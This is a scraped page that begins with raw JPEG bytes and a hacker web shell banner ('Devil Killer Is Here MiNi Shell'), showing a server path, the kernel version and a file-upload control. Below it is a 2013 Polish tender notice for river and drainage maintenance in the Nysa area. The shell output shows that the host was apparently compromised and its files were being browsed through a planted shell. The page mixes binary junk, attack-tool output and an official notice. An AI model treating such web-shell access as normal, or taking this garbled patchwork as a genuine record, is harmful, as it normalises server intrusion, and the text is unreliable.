JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/167003-N-2013.html

<p class="kh_header"><b>Opole: Utrzymanie urządzeń melioracji wodnych podstawowych na terenie działania WZMIUW w Opolu Oddział w Nysie</b><br>
<b>Numer ogłoszenia: 167003 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu , ul. Katowicka 55, 45-061 Opole, woj. opolskie, tel. 077 4425742, faks 077 4425726.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie urządzeń melioracji wodnych podstawowych na terenie działania WZMIUW w Opolu Oddział w Nysie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie urządzeń melioracji wodnych podstawowych na terenie działania WZMIUW w Opolu Oddział w Nysie
Niniejsze zadanie zawiera do wykonania roboty budowlane dla następujących części

Część 1.	Rzeka  Cielnica EL III  w km 4+200 - 9+100 mb, 4 900 mb;  m. Giełczyce gm.Skoroszyce, oraz Prusinowice  Gm. Pakosławice
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Usuwanie zatorów z powalonych drzew,
Naprawa umocnień skarp - opaska faszynowa i skarpowanie
Robort demontażowe zamknięć zastawki - zabezpieczenie antykorozyjne konstrukcji stalowych i zmagazynowanie  urządzeń u zamawiającego.
Naprawy płyty wypadowej i konstrukcji betonowej zastawki.
Część 2.	Rzeka  Lasocicki  EL I w km 0+000 - 9+540 , L=9 540 mb,  m. Brzeziny, Sidzina ,  gm. Skoroszyce
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Usuwanie namułu grubości 10 cm z cieków i głębokości do 1,50m i szerokości dna 1,0 m
Oczyszczenie z namułu przepustów o śred.1,25 m przy zam. 1/3 wys.
Oczyszczenie z namułu rurociągu mechanicznie , rewizja kamerą rurociągu, oraz przekrycie studni rewizyjnej 1,0 x 1,0m i jej oznakowanie.
Część 3.Rzeka  Krynka  EL I w km 24+021- 30+900 L=8 079 mb m. Szklary , Kamiennik oraz  35+300 - 36+500 m. Lipniki  gm. Kamiennik
Roboty do wykonania zgodnie z przedmiarem robót:
Usuwanie namułu grubości 20 cm z cieków o głębokości do 1,50 m i szerokości dna 1,00 m
Ręczne ścinanie krzaków średniej gęstości ze skarp wraz ze zrąbkowaniem
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 20 cm 
Ręczne wycinanie zakrzaczeń średniej gęstości ze skarp wraz ze zrąbkowaniem
Część 4.Rzeka Głuchołaski  EL II,w km 0+880 - 1+750;  L=870 mb, m. Głuchołazy gm. Głuchołazy
Roboty do wykonania zgodnie z przedmiarem robót:
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Demontaż ogrodzeń
Ręczna rozbiórka kontr .betonowych
Wykonanie uzupełnienia ubezpieczenia  płytami 90x60x10
Wykonanie uzupełnienia ubezpieczenia  płytami 100x75x12,5
Zabezpieczenie płyt istniejących
Korekta krawężnika betonowego przy podstawie skarpy
Palisady i szpilkowanie  ubezpieczeń dna i skarp cieku
Narzuty kamienne z kamienia ciężkiego
Wykonanie obudowy wylotu
Roboty ziemne ręczne z przewozem taczkami.
Część 5. Rzeka  Młynówka Skorochowska  w km 0+000- 3+200; L = 3 200 mb m. Skorochów,  gm. Nysa
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 30 cm
Odmulenie ręczne cieku o szer do 1,2m zamulenie średnio do 30 cm
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 20 cm
Odmulenie ręczne cieku o szer do 1,2m zamulenie średnio do 20 cm
Oczyszczenie z namułu przepustów o śred.1,25 m przy zam. 1/3 wys.
Usuwanie zatorów z koryta
Część 6. Rzeka  Prudnik w km 29+040 - 33+000; L= 3 960 mb -  m. Charbielin  gm. Głuchołazy                                                                                                  Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Usuwanie namułu grubości 20cm z cieków i głębokości do 1,50 m i szerokości dna 1,4 m 
Oczyszczenie z namułu przepustów i mostów
Ścinanie drzew i częściowo karczowanie pni
Termin realizacji robót: od 20.09.2013 - 14.11.2013 r

Część 7. Rzeka  Korzkiew  EL I  w km 12+170-12+550; oraz 13+600-14+300  L= 1 080 mb m. Nowaki  gm. Pakosławice                                               
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne ścinanie  rzadkich krzaków  ze  ząbkowaniem
Ręczne wykoszenie porostów rzadkich twardych ze skarp
Wygrabianie wykoszonych porostów ze skarp o szer. do 2.0 m
Usuwanie namułu grubości 20 cm oraz  usuwanie  nawisów ze  skarp z cieków o głębokości do 1.5 m i szerokości dna 2.0 m 
Usuwanie namułu grubości 20 cm z cieków o głębokości do 1.5 m i szerokości dna 1.2 m 
Rozplantowanie ręczne ziemi wydobytej z wykopów - za 1 m3 ziemi wzdłuż 1 m krawędzi wykopu  
Część 8. rzeka Świdna EL II w km 3+750-4+750,6+400-6+900, L=4 400 mb m.Sliwice,Meszno gm. Otmuchów oraz 10+000-13+320 m.Dziewiętlice gm.Paczków
Roboty do wykonania zgodnie z przedmiarem robót:
Wycinanie zakrzaczeń ze skarp porost średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Likwidacja łach w korycie rzeki                                                                      Naprawa opasek z kiszki faszynowej 15+15 cm
Wykonanie brzegosłonu płaskiego
Darniowanie skarp pasem 1,0m
Plantowanie skarp wraz z obsianiem skarp i przyległego terenu
Udrożnienie koryta koparką wraz z usunięciem nawisów na skarpach
Karczowanie pni wraz z wywozem karpiny 
Mechaniczne rozplantowanie gr kat I-IV                                                        
Część 9. Rzeka Janowicki EL II w km    4+600-5+600 L=1 000 mb m. Maciejowice , gm.Otmuchów
Roboty do wykonania zgodnie z przedmiarem robót:
Wycinanie zakrzaczeń ze skarp porost gęsty i średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Udrożnienie koryta  wraz z kształtowaniem skarp koparką. Ścinanie drzew piłą spalinową o śred.16-75 cm w tym 5 szt z podnośnika
Karczowanie pni koparką o poj 0,6m3
Ręczne roboty ziemne z odwozem taczkami na odl.10m
Plantowanie skarp wraz z obsianiem skarp i przyległego terenu
Odmulenie dna koparko odmularką
Karczowanie pni wraz z wywozem karpiny 
Mechaniczne rozplantowanie gr kat I-IV  
Wywóz karpiny wraz oczyszczeniem terenu po karczowaniu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy odstepuje od żądania wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże: 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie):
wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 roboty budowlanej, której przedmiotem zamówienia było wykonanie konserwacji, remontu lub odbudowy rzeki.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zawierały, co najmniej:
a. wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty, których dokumenty dotyczą,
b. wskazanie podmiotu, na rzecz którego realizowane były roboty,
c. wskazanie zakresu robót,
d. wskazanie wartości robót,
e. wskazanie daty wykonania (rozpoczęcia i zakończenia),
f. wskazanie miejsca wykonania, 
g. opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;

W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wcześniej wykonane wykonawca nie ma obowiązku przedkładania dokumentów potwierdzających ich należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia będzie uznany za spełniony, jeżeli Wykonawca: 
wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby/podmioty wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy):
(1) Kierownik Robót - posiadający:
-	wykształcenie w zakresie melioracji, budowli hydrotechnicznych lub budownictwa. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: 
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie oceniany wspólnie z warunkiem potencjał techniczny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WArunek nie będzie oceniany.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy moze nastapić za zgoda obu stron wyrażona na pismie w formie aneksu do umowy pod rygorem nieważności takiej zmiany, w nizej wymienionych przypadkach: I. zmiany terminu realizacji:
1) z powodu działania siły wyższej mające bezpośredni wpływ na terminowość wykonania robót, np. klęski żywiołowe,
2) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
3) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
4) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
5) z powodu wystąpienia dodatkowych okoliczności, a niemożliwych do przewidzenia przed zawarciem umowy pomimo zachowania należytej staranności;
6) z powodu niekorzystnych warunków atmosferycznych, z wyłączeniem warunków atmosferycznych typowych dla danej pory roku, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami);
7) z powodu zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy;
II. zmiany wynagrodzenia:   
- w przypadku zmiany technologii wykonania robót, na wniosek Wykonawcy lub Zamawiającego i pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego,
-    w przypadku odstąpienia na wniosek Zamawiającego od realizacji części robót,
-    w przypadku niewykonania przez Wykonawcę części robót.
Niezależnie od powyższego, Zamawiający i Wykonawca dopuszczają możliwość zmian umowy w następujących przypadkach:
1) zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany redakcyjne weryfikujące dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych;
2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
3) zmian kluczowego personelu Wykonawcy i Zamawiającego;
4) zmian jakości lub innych parametrów charakterystycznych dla danego elementu robót lub zmiany technologii, jeśli jest to uzasadnione dla prawidłowego wykonania robót;
5) zmiany zakresu przedmiotu umowy lub rezygnacji z części robót jeżeli będzie to uzasadnione dla prawidłowej realizacji przedmiotu umowy lub uzyskania założonego efektu;
6) zmiany innych warunków umowy jeżeli w chwili zawarcia umowy nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego.

Zmiana wynagrodzenia, o którym mowa w ust. 1 pkt 2 lit. a-c nastąpi na podstawie wyceny robót niewykonanych dokonanej w oparciu o stawki, ceny jednostkowe, narzuty i materiały z kosztorysu Wykonawcy przygotowanego zgodnie z postanowieniami SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzmiuw.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
Oddział w Nysie
ul Fałata 6a
48-300 Nysa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2013 godzina 08:00, miejsce: Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
Oddział w Nysie
ul Fałata 6a
48-300 Nysa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





